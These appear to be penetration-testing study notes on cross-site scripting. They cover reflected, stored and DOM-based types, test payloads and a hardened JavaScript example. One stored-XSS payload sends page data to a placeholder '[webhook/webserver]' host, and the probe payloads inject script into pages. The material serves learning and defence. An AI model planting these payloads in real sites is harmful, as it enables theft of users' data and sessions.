XSS

There are three different types of cross-site scripting:

  • Reflected

  • Stored

  • DOM-based

There are many options to confirm XSS:

// Embed a script tag
<script>prompt(1);</script>

// Use an error state of an image
<img src="x" onError="prompt(1);" />

// Test HTML injection to be a bit more subtle
<h1>testing</h1>

// For a stored XSS, we can use javascript to create an image
<script>var i = new Image;i.src="[webhook/webserver]?[info to exfiltrate]";</script>

Reflected

The script you are trying to inject comes from the current request (e.g. a URL parameter echoed into the response), so the victim has to be made to send that request. Somewhat limiting.

Stored

Payload is stored server-side in something like a database and served to every user who views it, so the impact is much higher.

DOM-Based

The client side has vulnerable JS that uses untrusted input (e.g. from the URL) in a dangerous DOM sink, rather than there being a vulnerability server-side.

This can be seen when your input data shows up on the page but no network request carrying it is made, meaning the data is handled entirely in the DOM by client-side script.
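As an added example (not from the original notes), the DOM-based case above with its fix: a hypothetical page greets the user by a "name" taken from the URL query string without any server round trip. The vulnerable version concatenates the value into markup; the hardened version HTML-encodes it, using the page's own `<h1>testing</h1>` probe as the sample input.

```javascript
// Constructed example: a DOM-based XSS sink beside its hardened form.

// Source: untrusted input read from the URL on the client; no request to
// the server is involved, which is the DOM-based situation described above.
function nameFromUrl(url) {
  const params = new URL(url).searchParams;
  return params.get("name") || "guest";
}

// Vulnerable: the value is spliced into markup as-is. Once this string is
// assigned to innerHTML, any tag in the input is parsed and rendered, so the
// <h1>testing</h1> probe shows up as a real heading.
function greetingMarkupUnsafe(name) {
  return "<h1>Hello, " + name + "</h1>";
}

// Hardened: encode the characters that can change HTML context before the
// value ever reaches a DOM sink.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function greetingMarkupSafe(name) {
  return "<h1>Hello, " + escapeHtml(name) + "</h1>";
}

// Quick check used when reviewing output: does a tag from the input survive
// into the generated markup? (Strips only the wrapper heading first.)
function probeRendersAsTag(markup) {
  const inner = markup.replace(/^<h1>Hello, /, "").replace(/<\/h1>$/, "");
  return /<[a-z]/i.test(inner);
}

// Usage (constructed URL; %3Ch1%3Etesting%3C%2Fh1%3E decodes to the probe)
const probeUrl = "https://example.test/page?name=%3Ch1%3Etesting%3C%2Fh1%3E";
const name = nameFromUrl(probeUrl);
console.log(greetingMarkupUnsafe(name), probeRendersAsTag(greetingMarkupUnsafe(name))); // true
console.log(greetingMarkupSafe(name), probeRendersAsTag(greetingMarkupSafe(name)));     // false
```

In a real page the simplest fix is to write the value with `textContent` (or `createTextNode`) instead of `innerHTML`; the escaping function is for cases where a markup string must be built anyway.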
